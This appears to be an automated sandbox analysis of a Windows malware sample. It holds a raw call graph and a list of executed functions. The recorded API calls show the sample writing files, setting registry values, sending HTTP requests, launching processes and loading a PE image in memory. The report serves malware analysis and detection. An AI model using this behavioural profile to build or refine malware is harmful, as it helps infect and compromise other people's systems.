42620 100020a9 42850 10001bb9 42620->42850 42623 10001bb9 25 API calls 42624 100020bb 42623->42624 42625 10001bb9 25 API calls 42624->42625 42626 100020c4 42625->42626 42854 10001725 8 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 42626->42854 42628 100020df __FrameHandler3::FrameUnwindToState 42629 10002100 CreateProcessA 42628->42629 42630 10002135 42629->42630 42631 1000213c ShellExecuteA 42629->42631 42630->42631 42632 1000215b 42630->42632 42631->42632 42633 10001bb9 25 API calls 42632->42633 42633->42606 42635 100010ad 42634->42635 42636 100010bd CoUninitialize 42635->42636 42637->41257 42638->41257 42639->41257 42640->41303 42641->41303 42642->41303 42645->41309 42646->41309 42647->41309 42648->41348 42650->41330 42651->41349 42652->41371 42653->41387 42654->41404 42655->41332 42656->41347 42657->41369 42658->41389 42659->41404 42660->41323 42661->41358 42662->41381 42663->41398 42664->41415 42665->41428 42666->41469 42667->41474 42668->41469 42669->41361 42670->41400 42671->41420 42672->41433 42673->41450 42674->41472 42675->41469 42676->41526 42677->41394 42678->41401 42679->41437 42680->41455 42681->41477 42682->41503 42683->41525 42684->41553 42685->41573 42686->41611 42687->41622 42688->41430 42689->41435 42690->41479 42691->41507 42692->41533 42693->41555 42694->41578 42695->41604 42696->41478 42697->41536 42698->41559 42699->41581 42700->41608 42701->41624 42702->41639 42703->41535 42704->41584 42705->41612 42706->41625 42707->41642 42708->41659 42709->41587 42710->41627 42711->41646 42712->41656 42713->41670 42714->41659 42715->41499 42716->41407 42725->42509 42726->42509 42727->42499 42728->42506 42730 40fcf2 ___std_exception_copy 42729->42730 42735 40fb18 42730->42735 42736 40fb4e 42735->42736 42737 40fb62 42736->42737 42739 40fb86 42736->42739 42747 40fb7b 42736->42747 42760 40cf22 39 API calls ___std_exception_copy 42737->42760 42743 40fb96 42739->42743 42761 40f660 39 API calls 2 library calls 42739->42761 42741 40fbc6 42745 40fbd4 42741->42745 42746 40fc8c 42741->42746 42742 40fba8 42762 414d57 5 API calls ___scrt_uninitialize_crt 42742->42762 42743->42741 42743->42742 42745->42747 42763 414cbe MultiByteToWideChar ___scrt_uninitialize_crt 42745->42763 42746->42747 42765 414cbe MultiByteToWideChar ___scrt_uninitialize_crt 42746->42765 42754 40ccdb 42747->42754 42750 40fc0a 42750->42747 42751 40fc15 GetLastError 42750->42751 42751->42747 42752 40fc35 42751->42752 42752->42747 42764 414cbe MultiByteToWideChar ___scrt_uninitialize_crt 42752->42764 42755 40cce7 42754->42755 42758 40ccfe 42755->42758 42766 40cd86 39 API calls 2 library calls 42755->42766 42757 4036ac CryptHashData 42757->42526 42757->42527 42758->42757 42767 40cd86 39 API calls 2 library calls 42758->42767 42760->42747 42761->42743 42762->42747 42763->42750 42764->42747 42765->42747 42766->42758 42767->42757 42768->42576 42770 402cf0 42769->42770 42771 402e22 42769->42771 42770->42771 42772 402e11 SetLastError 42770->42772 42773 402df4 SetLastError 42770->42773 42775 402dd5 SetLastError 42770->42775 42771->42569 42772->42569 42773->42569 42775->42569 42782 402b83 42777->42782 42778 402ca2 42779 402a20 52 API calls 42778->42779 42780 402cb4 42779->42780 42780->42577 42782->42778 42783 402c99 42782->42783 42791 402a20 42782->42791 42783->42577 42784->42541 42785->42547 42786->42545 42787->42562 42789 4132b1 ___free_lconv_mon 14 API calls 42788->42789 42790 4030fe 42789->42790 42790->42567 42790->42570 42792 402a39 42791->42792 42801 402a75 42791->42801 42793 402a8e VirtualProtect 42792->42793 42798 402a44 42792->42798 42796 402ad2 GetLastError FormatMessageA 42793->42796 42793->42801 42794 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 42795 402a8a 42794->42795 42795->42782 42797 402af7 42796->42797 42797->42797 42799 402afe LocalAlloc 42797->42799 42798->42801 42806 402e50 VirtualFree 42798->42806 42807 4029b0 44 API calls 42799->42807 42801->42794 42802 402b21 OutputDebugStringA LocalFree LocalFree 42803 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 42802->42803 42804 402b47 42803->42804 42804->42782 42806->42801 42807->42802 42809 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 42808->42809 42809->42593 42862 10006e9c GetLastError 42810->42862 42814 1000152f __EH_prolog3_GS 42813->42814 42906 1000184b 42814->42906 42817 10001593 42910 1000190a 42817->42910 42818 100015ff 42915 1000179a 42818->42915 42820 10001541 42820->42817 42826 1000179a 27 API calls 42820->42826 42821 1000160d 42920 10005939 42821->42920 42824 10001650 InternetSetOptionA InternetConnectA 42828 10001692 HttpOpenRequestA 42824->42828 42829 100016e8 InternetCloseHandle 42824->42829 42825 100016eb 42827 10001704 42825->42827 42969 10001bdc 25 API calls 42825->42969 42826->42817 42831 10001bb9 25 API calls 42827->42831 42832 100016e2 InternetCloseHandle 42828->42832 42833 100016bc 42828->42833 42829->42825 42834 1000171b 42831->42834 42832->42829 42923 100010c7 42833->42923 42970 1000e8a5 42834->42970 42839 100016d3 42937 10001175 42839->42937 42840 100016df InternetCloseHandle 42840->42832 42843->42605 42844->42609 42845->42612 42846->42614 42847->42616 42848->42618 42849->42620 42851 10001bc4 42850->42851 42852 10001bcc 42850->42852 43013 10001bdc 25 API calls 42851->43013 42852->42623 42854->42628 42856 10002707 42855->42856 42857 10002708 IsProcessorFeaturePresent 42855->42857 42856->42603 42859 10002b1c 42857->42859 43014 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 42859->43014 42861 10002bff 42861->42603 42863 10006eb3 42862->42863 42864 10006eb9 42862->42864 42891 10007580 6 API calls _free 42863->42891 42868 10006ebf SetLastError 42864->42868 42892 100075bf 6 API calls _free 42864->42892 42867 10006ed7 42867->42868 42869 10006edb 42867->42869 42873 10006f53 42868->42873 42874 100059df 42868->42874 42893 10007aa7 14 API calls _free 42869->42893 42872 10006ee7 42875 10006f06 42872->42875 42876 10006eef 42872->42876 42904 10006928 37 API calls __FrameHandler3::FrameUnwindToState 42873->42904 42874->42596 42901 100075bf 6 API calls _free 42875->42901 42894 100075bf 6 API calls _free 42876->42894 42880 10006efd 42895 10007a3c 42880->42895 42882 10006f12 42883 10006f16 42882->42883 42884 10006f27 42882->42884 42902 100075bf 6 API calls _free 42883->42902 42903 10006c9e 14 API calls _free 42884->42903 42888 10006f03 42888->42868 42889 10006f32 42890 10007a3c _free 14 API calls 42889->42890 42890->42888 42891->42864 42892->42867 42893->42872 42894->42880 42896 10007a47 RtlFreeHeap 42895->42896 42900 10007a70 _free 42895->42900 42897 10007a5c 42896->42897 42896->42900 42905 10005926 14 API calls _free 42897->42905 42899 10007a62 GetLastError 42899->42900 42900->42888 42901->42882 42902->42880 42903->42889 42905->42899 42907 10001868 42906->42907 42907->42907 42908 1000190a 27 API calls 42907->42908 42909 1000187c 42908->42909 42909->42820 42911 10001978 42910->42911 42914 10001920 __InternalCxxFrameHandler 42910->42914 42973 10001a59 27 API calls std::_Xinvalid_argument 42911->42973 42914->42818 42916 100017b3 __InternalCxxFrameHandler 42915->42916 42917 100017eb 42915->42917 42916->42821 42974 10001884 27 API calls 42917->42974 42975 100070ee 42920->42975 42924 100010d3 __EH_prolog3_GS 42923->42924 42925 1000184b 27 API calls 42924->42925 42926 100010e3 HttpAddRequestHeadersA 42925->42926 43001 100017f1 42926->43001 42928 10001112 HttpAddRequestHeadersA 42929 100017f1 27 API calls 42928->42929 42930 10001132 HttpAddRequestHeadersA 42929->42930 42931 100017f1 27 API calls 42930->42931 42932 10001152 HttpAddRequestHeadersA 42931->42932 42933 10001bb9 25 API calls 42932->42933 42934 1000116d 42933->42934 42935 1000e8a5 5 API calls 42934->42935 42936 10001172 HttpSendRequestA 42935->42936 42936->42839 42936->42840 42938 10001184 __EH_prolog3_GS 42937->42938 42939 100011c5 InternetSetFilePointer 42938->42939 42940 100011e3 InternetReadFile 42939->42940 42942 1000121d __InternalCxxFrameHandler 42940->42942 42941 10001260 __FrameHandler3::FrameUnwindToState 42943 1000127d HttpQueryInfoA 42941->42943 42942->42940 42942->42941 42944 100012a6 CoCreateInstance 42943->42944 42945 1000150a 42943->42945 42944->42945 42946 100012d8 42944->42946 42947 1000e8a5 5 API calls 42945->42947 42946->42945 42949 1000184b 27 API calls 42946->42949 42948 10001520 42947->42948 42948->42840 42950 100012f7 42949->42950 43006 10001006 30 API calls 42950->43006 42952 1000130c 42953 10001bb9 25 API calls 42952->42953 42959 1000134f __FrameHandler3::FrameUnwindToState 42953->42959 42954 1000149d 43010 10005926 14 API calls _free 42954->43010 42956 100014ae __InternalCxxFrameHandler 42956->42945 42957 10001427 __InternalCxxFrameHandler 42957->42954 42957->42956 42960 100014aa __FrameHandler3::FrameUnwindToState 42957->42960 42958 100014a2 43012 1000584c 25 API calls __strnicoll 42958->43012 42959->42956 42959->42957 42963 10001456 42959->42963 42964 10001449 42959->42964 42960->42956 43011 10005926 14 API calls _free 42960->43011 42963->42957 43008 10005926 14 API calls _free 42963->43008 43007 10005926 14 API calls _free 42964->43007 42966 1000144e 43009 1000584c 25 API calls __strnicoll 42966->43009 42969->42827 42971 100026ff __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 42970->42971 42972 10001722 42971->42972 42972->42597 42972->42601 42978 10007102 42975->42978 42976 10007106 42979 10001629 InternetOpenA 42976->42979 42994 10005926 14 API calls _free 42976->42994 42978->42976 42978->42979 42981 10007140 42978->42981 42979->42824 42979->42825 42980 10007130 42995 1000584c 25 API calls __strnicoll 42980->42995 42996 100069d1 37 API calls 2 library calls 42981->42996 42984 1000714c 42985 10007156 42984->42985 42988 1000716d 42984->42988 42997 1000a31e 25 API calls 2 library calls 42985->42997 42987 100071ef 42987->42979 42998 10005926 14 API calls _free 42987->42998 42988->42987 42989 10007244 42988->42989 42989->42979 43000 10005926 14 API calls _free 42989->43000 42992 10007238 42999 1000584c 25 API calls __strnicoll 42992->42999 42994->42980 42995->42979 42996->42984 42997->42979 42998->42992 42999->42979 43000->42979 43002 100017ff 43001->43002 43003 1000180d __InternalCxxFrameHandler 43002->43003 43005 1000188f 27 API calls __InternalCxxFrameHandler 43002->43005 43003->42928 43005->43003 43006->42952 43007->42966 43008->42966 43009->42957 43010->42958 43011->42958 43012->42956 43013->42852 43014->42861 43016 4128a2 _unexpected 39 API calls 43015->43016 43017 410686 43016->43017 43017->41740 43140 408a70 43018->43140 43020 403d02 43020->41740 43021 410681 39 API calls 43022 403ca2 43021->43022 43022->43020 43022->43021 43154 408fb0 43 API calls 3 library calls 43022->43154 43025 40226b 43024->43025 43026 40220d 43024->43026 43027 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 43025->43027 43026->43025 43028 402213 CreateFileA 43026->43028 43029 402279 43027->43029 43028->43025 43030 402233 WriteFile CloseHandle 43028->43030 43029->41780 43031 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 43030->43031 43032 402265 43031->43032 43032->41780 43033->41749 43034->41755 43035->41750 43036->41762 43037->41769 43038->41764 43039->41799 43040->41806 43041->41802 43042->41819 43043->41828 43044->41821 43045->41855 43046->41868 43047->41859 43048->41895 43049->41901 43050->41908 43051->41889 43052->41777 43053->41777 43054->41777 43055->41861 43056->41861 43057->41861 43060->41888 43061->41888 43062->41888 43063->41924 43065->41902 43066->41925 43067->41948 43068->41965 43069->41982 43070->41900 43071->41923 43072->41946 43073->41967 43074->41982 43075->41885 43076->41933 43077->41959 43078->41975 43079->41995 43080->42007 43081->42047 43082->42051 43083->42047 43084->41936 43085->41978 43086->41997 43087->42010 43088->42029 43089->42052 43090->42047 43091->42103 43092->41972 43093->41980 43094->42015 43095->42031 43096->42055 43097->42078 43098->42107 43099->42131 43104->42014 43105->42057 43106->42083 43107->42111 43108->42135 43111->42056 43112->42114 43113->42139 43118->42113 43130->42080 43131->41984 43141 408a8b 43140->43141 43153 408b74 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 43140->43153 43142 408c01 43141->43142 43146 408b21 43141->43146 43147 408afa 43141->43147 43152 408b0b __InternalCxxFrameHandler 43141->43152 43141->43153 43157 4015d0 43 API calls 3 library calls 43142->43157 43144 408c06 43158 401530 41 API calls 3 library calls 43144->43158 43146->43152 43156 401530 41 API calls 4 library calls 43146->43156 43147->43144 43155 401530 41 API calls 4 library calls 43147->43155 43148 408c0b 43151 40cfaf 39 API calls 43151->43142 43152->43151 43152->43153 43153->43022 43154->43022 43155->43152 43156->43152 43157->43144 43158->43148 43159->42314 43163 412b8d 43160->43163 43166 412ba1 43163->43166 43164 412ba5 43181 40200e InternetOpenA 43164->43181 43182 40d09d 14 API calls __dosmaperr 43164->43182 43166->43164 43168 412bdf 43166->43168 43166->43181 43167 412bcf 43183 40cf9f 39 API calls ___std_exception_copy 43167->43183 43184 40d0cd 39 API calls 2 library calls 43168->43184 43171 412beb 43172 412bf5 43171->43172 43177 412c0c 43171->43177 43185 4193d9 39 API calls 2 library calls 43172->43185 43174 412cee 43174->43181 43188 40d09d 14 API calls __dosmaperr 43174->43188 43176 412c96 43176->43181 43186 40d09d 14 API calls __dosmaperr 43176->43186 43177->43174 43177->43176 43179 412ce2 43187 40cf9f 39 API calls ___std_exception_copy 43179->43187 43181->42325 43182->43167 43183->43181 43184->43171 43185->43181 43186->43179 43187->43181 43188->43181 43190 4104cc 43189->43190 43191 4104de 43189->43191 43216 40a69e GetModuleHandleW 43190->43216 43201 410330 43191->43201 43195 4104d1 43195->43191 43217 410580 GetModuleHandleExW 43195->43217 43196 40a1e4 43196->40694 43202 41033c ___scrt_is_nonwritable_in_current_image 43201->43202 43223 41088b EnterCriticalSection 43202->43223 43204 410346 43224 4103b7 43204->43224 43206 410353 43228 410371 43206->43228 43209 410536 43233 410567 43209->43233 43211 410540 43212 410554 43211->43212 43213 410544 GetCurrentProcess TerminateProcess 43211->43213 43214 410580 CallUnexpected 3 API calls 43212->43214 43213->43212 43215 41055c ExitProcess 43214->43215 43216->43195 43218 4105e0 43217->43218 43219 4105bf GetProcAddress 43217->43219 43221 4105e6 FreeLibrary 43218->43221 43222 4104dd 43218->43222 43219->43218 43220 4105d3 43219->43220 43220->43218 43221->43222 43222->43191 43223->43204 43225 4103c3 ___scrt_is_nonwritable_in_current_image CallUnexpected 43224->43225 43227 410427 CallUnexpected 43225->43227 43231 411fe5 14 API calls 2 library calls 43225->43231 43227->43206 43232 4108d3 LeaveCriticalSection 43228->43232 43230 41035f 43230->43196 43230->43209 43231->43227 43232->43230 43236 414fe9 5 API calls CallUnexpected 43233->43236 43235 41056c CallUnexpected 43235->43211 43236->43235 43237 a74916 43238 a74a2b VirtualProtect 43237->43238 43240 a74f52 43238->43240 43241 10005bf4 43242 10007a3c _free 14 API calls 43241->43242 43243 10005c0c 43242->43243 43244 aa0672 VirtualProtect 43245 aa06b3 43244->43245 43246 9a7263 43247 9a722b 43246->43247 43248 9a9b7b RegOpenKeyA 43247->43248 43249 9a9ba2 RegOpenKeyA 43247->43249 43248->43249 43250 9a9b98 43248->43250 43251 9a9bbf 43249->43251 43250->43249 43252 9a9c03 GetNativeSystemInfo 43251->43252 43253 9a9c0e 43251->43253 43252->43253 43254 aa2980 43255 aa2987 Sleep 43254->43255 43257 aa29c9 43255->43257 43258 f0c8ee 43259 f0c8fd 43258->43259 43262 f0d08e 43259->43262 43263 f0d0a9 43262->43263 43264 f0d0b2 CreateToolhelp32Snapshot 43263->43264 43265 f0d0ce Module32First 43263->43265 43264->43263 43264->43265 43266 f0c906 43265->43266 43267 f0d0dd 43265->43267 43269 f0cd4d 43267->43269 43270 f0cd78 43269->43270 43271 f0cdc1 43270->43271 43272 f0cd89 VirtualAlloc 43270->43272 43271->43271 43272->43271 43273 100079ee 43274 10007a2c 43273->43274 43278 100079fc _free 43273->43278 43281 10005926 14 API calls _free 43274->43281 43275 10007a17 RtlAllocateHeap 43277 10007a2a 43275->43277 43275->43278 43278->43274 43278->43275 43280 10005aed EnterCriticalSection LeaveCriticalSection _free 43278->43280 43280->43278 43281->43277 43282 4b3003c 43283 4b30049 43282->43283 43297 4b30e0f SetErrorMode SetErrorMode 43283->43297 43288 4b30265 43289 4b302ce VirtualProtect 43288->43289 43291 4b3030b 43289->43291 43290 4b30439 VirtualFree 43295 4b305f4 LoadLibraryA 43290->43295 43296 4b304be 43290->43296 43291->43290 43292 4b304e3 LoadLibraryA 43292->43296 43294 4b308c7 43295->43294 43296->43292 43296->43295 43298 4b30223 43297->43298 43299 4b30d90 43298->43299 43300 4b30dad 43299->43300 43301 4b30dbb GetPEB 43300->43301 43302 4b30238 VirtualAlloc 43300->43302 43301->43302 43302->43288

                                            Executed Functions

                                            Function 00403D20 Relevance: 56.1, APIs: 25, Strings: 6, Instructions: 1839sleepcomCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?,CA335CE0,75920F00,00000000), ref: 00403D8A
                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F19
                                            • Sleep.KERNEL32(000003E8), ref: 00403F22
                                            • __Init_thread_footer.LIBCMT ref: 004044F7
                                            • __Init_thread_footer.LIBCMT ref: 004046BD
                                            • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 004048C7
                                            • __Init_thread_footer.LIBCMT ref: 00404955
                                            • __Init_thread_footer.LIBCMT ref: 00404BBE
                                            • CoInitialize.OLE32(00000000), ref: 00404C3F
                                            • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404C5A
                                            • __Init_thread_footer.LIBCMT ref: 004050BD
                                            • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                            • __Init_thread_footer.LIBCMT ref: 004053CB
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404CC8
                                              • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,CA335CE0), ref: 004107F7
                                              • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            • CoUninitialize.COMBASE(?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D,?,?,?,?,00000000,0042DA28), ref: 00404D01
                                            • CoUninitialize.OLE32(?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404DC4
                                            • CoUninitialize.OLE32(?,?,?,?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404E45
                                            • __Init_thread_footer.LIBCMT ref: 00404026
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                              • Part of subcall function 004021F0: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                              • Part of subcall function 004021F0: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                              • Part of subcall function 004021F0: CloseHandle.KERNEL32(00000000), ref: 0040224E
                                            • __Init_thread_footer.LIBCMT ref: 00404202
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                                            • String ID: KDOX$SUB=$]DFE$^OX*$get$viFO
                                            • API String ID: 995133137-4208347134
                                            • Opcode ID: 2b5074e5ae3f74629323bde4956dacc6f2b5a6a8a3ea0f745ae83f81f010b08c
                                            • Instruction ID: 2a7656185698f67e8fe61b04cbca63a222de47e8cf16a67dea48f36782a400ee
                                            • Opcode Fuzzy Hash: 2b5074e5ae3f74629323bde4956dacc6f2b5a6a8a3ea0f745ae83f81f010b08c
                                            • Instruction Fuzzy Hash: 7BF2D1B0E042188BDB24DF24CC49B9EBBB1EF45304F5441E9E5097B2D2DB78AA85CF59
                                            Function 00404F50 Relevance: 40.1, APIs: 16, Strings: 6, Instructions: 1645sleepregistryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,CA335CE0), ref: 004107F7
                                              • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 004050BD
                                            • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                            • __Init_thread_footer.LIBCMT ref: 004053CB
                                            • Sleep.KERNEL32(000007D0), ref: 00405735
                                            • Sleep.KERNEL32(000007D0), ref: 0040574F
                                            • CoUninitialize.OLE32(?,?,0042DB3D,?,?,?,?,?,?,?,?,?,?,00000000,0042DB21), ref: 00405785
                                            • CoUninitialize.OLE32(?,?,?,?,?,0042DB3D,?,?,?,?,?,?,?), ref: 004057B1
                                            • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                            • Sleep.KERNEL32(000005DC), ref: 00405A90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                            • String ID: DFEK$SUB=$get$mixone$updateSW$U%
                                            • API String ID: 606935701-3680244588
                                            • Opcode ID: 4db77f0429fbeff6bc7245b50d1839831cba9557f07ad327e6d61b565521e7f7
                                            • Instruction ID: 0d5b8b6ccd7ac2cce54ba59243f10dcebe2db4c82d63bd9967a8cdfa7b9099a4
                                            • Opcode Fuzzy Hash: 4db77f0429fbeff6bc7245b50d1839831cba9557f07ad327e6d61b565521e7f7
                                            • Instruction Fuzzy Hash: F5D20471D001148BDB14EB24CC597AEBB75AF01308F5481BEE8097B2D2DB78AE85CF99
                                            Function 00402EC0 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 454COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2198 402ec0-402ede 2199 402ee0-402f07 SetLastError call 4029f0 call 4099d7 2198->2199 2200 402f08-402f10 2198->2200 2202 402f12 2200->2202 2203 402f3d-402f47 2200->2203 2207 402f17-402f3c call 4029f0 SetLastError call 4099d7 2202->2207 2204 402f71-402f7f 2203->2204 2205 402f49-402f70 SetLastError call 4029f0 call 4099d7 2203->2205 2209 402f81-402f86 2204->2209 2210 402f88-402f91 2204->2210 2209->2207 2215 402f93-402f98 2210->2215 2216 402f9d-402fa5 2210->2216 2215->2207 2220 402fb1-402fbe 2216->2220 2221 402fa7-402fac 2216->2221 2224 402fc0-402fc2 2220->2224 2225 402fe7-40300a GetNativeSystemInfo 2220->2225 2221->2207 2226 402fc5-402fcc 2224->2226 2227 403016-40302e VirtualAlloc 2225->2227 2228 40300c-403011 2225->2228 2229 402fd3 2226->2229 2230 402fce-402fd1 2226->2230 2231 403030-403040 VirtualAlloc 2227->2231 2232 403056-403075 HeapAlloc 2227->2232 2228->2207 2233 402fd5-402fe2 2229->2233 2230->2233 2231->2232 2234 403042-40304f call 4029f0 2231->2234 2238 403077-403084 VirtualFree 2232->2238 2239 40308b-4030d1 2232->2239 2233->2226 2235 402fe4 2233->2235 2234->2232 2235->2225 2238->2239 2241 4030d7-4030d9 SetLastError 2239->2241 2242 40316f-4031b9 VirtualAlloc call 40afb0 2239->2242 2243 4030df-4030e3 2241->2243 2248 40326d-403278 2242->2248 2249 4031bf 2242->2249 2245 4030e5-4030f2 2243->2245 2246 4030f6-403106 call 40fab8 2243->2246 2245->2246 2259 403135-40313a 2246->2259 2260 403108-40310d 2246->2260 2252 4032fd 2248->2252 2253 40327e-403285 2248->2253 2251 4031c2-4031c7 2249->2251 2255 403206-40320e 2251->2255 2256 4031c9-4031d1 2251->2256 2261 403302-40330e call 402cd0 2252->2261 2257 403287-403289 2253->2257 2258 40328e-4032a0 2253->2258 2255->2241 2268 403214-403227 call 402e30 2255->2268 2263 403252-403264 2256->2263 2264 4031d3-4031ed 2256->2264 2257->2261 2258->2252 2267 4032a2-4032b7 2258->2267 2265 40313c-40314c 2259->2265 2266 40314f-40316e HeapFree call 4099d7 2259->2266 2269 40312c-403132 call 40fab8 2260->2269 2270 40310f 2260->2270 2261->2243 2277 403314-403316 call 402b50 2261->2277 2263->2251 2272 40326a 2263->2272 2264->2243 2288 4031f3-403204 call 40b530 2264->2288 2265->2266 2274 4032b9-4032bc 2267->2274 2275 4032ee-4032f8 2267->2275 2283 403229-40322e 2268->2283 2269->2259 2276 403110-403115 2270->2276 2272->2248 2281 4032c0-4032d1 2274->2281 2275->2267 2284 4032fa 2275->2284 2285 403126-40312a 2276->2285 2286 403117-403123 2276->2286 2293 40331b-40331d 2277->2293 2289 4032d3-4032db 2281->2289 2290 4032de-4032ec 2281->2290 2283->2243 2292 403234-403249 call 40afb0 2283->2292 2284->2252 2285->2269 2285->2276 2286->2285 2301 40324c-40324f 2288->2301 2289->2290 2290->2275 2290->2281 2292->2301 2293->2243 2298 403323-40332d 2293->2298 2302 403351-403358 2298->2302 2303 40332f-403338 2298->2303 2301->2263 2305 4033aa-4033c3 call 4099d7 2302->2305 2306 40335a-403363 2302->2306 2303->2302 2304 40333a-40333e 2303->2304 2304->2302 2307 403340-40334f 2304->2307 2309 403394-4033a9 call 4099d7 2306->2309 2310 403365-40336e 2306->2310 2307->2302 2316 403370 2310->2316 2317 40337a-403393 call 4099d7 2310->2317 2316->2317
                                            APIs
                                            • SetLastError.KERNEL32(0000000D), ref: 00402EE2
                                            • SetLastError.KERNEL32(000000C1), ref: 00402F24
                                            Strings
                                            • p.@P.@0.@, xrefs: 004030C5
                                            • alignedImageSize != AlignValueUp!, xrefs: 0040300C
                                            • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402F93
                                            • ERROR_OUTOFMEMORY!, xrefs: 00403042
                                            • Section alignment invalid!, xrefs: 00402FA7
                                            • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402F81
                                            • Size is not valid!, xrefs: 00402EE8
                                            • DOS header is not valid!, xrefs: 00402F12
                                            • DOS header size is not valid!, xrefs: 00402F51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast
                                            • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!$p.@P.@0.@
                                            • API String ID: 1452528299-2075088523
                                            • Opcode ID: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                            • Instruction ID: 9256140b0f890bfcd87a01f3051d579660d3e2dc250f0df49545701e60f9fd82
                                            • Opcode Fuzzy Hash: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                            • Instruction Fuzzy Hash: CCF1CE71B002059BCB10CFA9D985BAAB7B4BF48305F14417AE909EB3C2D779ED11CB98
                                            Function 004035B0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
